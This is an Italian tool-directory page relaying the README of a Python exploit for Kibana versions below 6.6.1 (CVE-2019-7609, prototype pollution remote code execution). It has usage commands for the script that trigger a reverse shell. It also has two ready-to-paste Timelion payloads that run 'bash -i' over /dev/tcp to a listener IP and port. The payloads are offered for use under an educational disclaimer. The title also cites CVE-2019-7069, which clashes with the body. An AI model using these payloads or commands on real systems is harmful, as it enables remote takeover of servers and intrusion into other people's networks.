Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-7069-POC — Exploit Python 3 per Kibana < 6.6.1 RCE (CVE-2019-7609) tramite prototype pollution, con rilevamento automatico della versione e reverse shell opzionale. | Kitploit
Strumenti/GitHubGitHub/caelumisme/cve-2019-7069-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

Exploit Python 3 per Kibana < 6.6.1 RCE (CVE-2019-7609) tramite prototype pollution, con rilevamento automatico della versione e reverse shell opzionale.

Vedi Repository
110 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit di Remote Code Execution per Kibana < 6.6.1 (CVE-2019-7609)

Exploit Banner

🚨 Exploit RCE Educativo 🚨

Autore: LandGrey (Refactoring Python3 di [Il Tuo Nome])
Riferimento: Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ Dichiarazione di non responsabilità:
Questo script è solo per scopi educativi e test di penetrazione autorizzati. Non utilizzarlo su sistemi di cui non possiedi o per i quali non hai esplicita autorizzazione. L'autore e i collaboratori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.


🎯 Cos'è?

Questo è uno script exploit Python 3 per la vulnerabilità di Remote Code Execution nelle versioni di Kibana < 6.6.1. Sfrutta una falla di prototype pollution per eseguire comandi arbitrari, inclusa l'apertura di una reverse shell, su un'istanza vulnerabile di Kibana.

🕹️ Caratteristiche

  • Rileva automaticamente la versione di Kibana
  • Verifica lo stato della vulnerabilità
  • Opzionalmente attiva una reverse shell verso il tuo listener
  • Output del terminale pulito e interattivo
  • Completamente compatibile con Python 3
  • 📚 Riferimenti

    • Voce Exploit-DB 46651
    • Sito Ufficiale di Kibana
    • CVE-2019-7609

    🚀 Utilizzo

    root@kitploit:~
    python3 kibana_exploit.py -u http://target-kibana:5601
    

    Per attivare una reverse shell:

    root@kitploit:~
    python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
    

    Esempio

    root@kitploit:~
    python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
    

    🛠️ Requisiti

    • Python 3.x
    • requests library
    • packaging library

    Installa le dipendenze con:

    root@kitploit:~
    pip install requests packaging
    

    💡 Sfruttamento Manuale tramite Timelion

    Puoi anche sfruttare questa vulnerabilità manualmente utilizzando il visualizzatore Timelion di Kibana:

    1. Apri Kibana
    2. Incolla uno dei seguenti payload nel visualizzatore Timelion
    3. Clicca Esegui
    4. Nel pannello sinistro, clicca su Canvas
    5. La tua reverse shell dovrebbe apparire! :)

    Payload di securityMB:

    root@kitploit:~
    .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
    .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
    

    Payload di chybeta:

    root@kitploit:~
    .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
    .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
    

    Sostituisci 192.168.1.100 e 4444 con il tuo IP e porta del listener.


    🧩 Come Funziona

    • Rileva la versione di Kibana tramite richiesta HTTP
    • Verifica se il target è vulnerabile a CVE-2019-7609
    • Sfrutta la prototype pollution per eseguire comandi arbitrari
    • Opzionalmente genera una reverse shell verso l'host e la porta specificati

    🎨 Output

    Lo script fornisce un output chiaro e passo-passo per rilevamento, verifica e sfruttamento, rendendolo facile da seguire e divertente da usare!


    👾 Per Divertimento e Apprendimento

    Questo script è un ottimo modo per imparare sulla prototype pollution, l'esecuzione di codice remoto e le tecniche di penetration testing. Usalo responsabilmente e sempre con permesso!


    📝 Licenza

    Questo progetto è solo per uso educativo. Nessuna garanzia, nessuna assicurazione. Hackerare eticamente, rimanere curiosi e divertirsi!

    Scarica lo strumento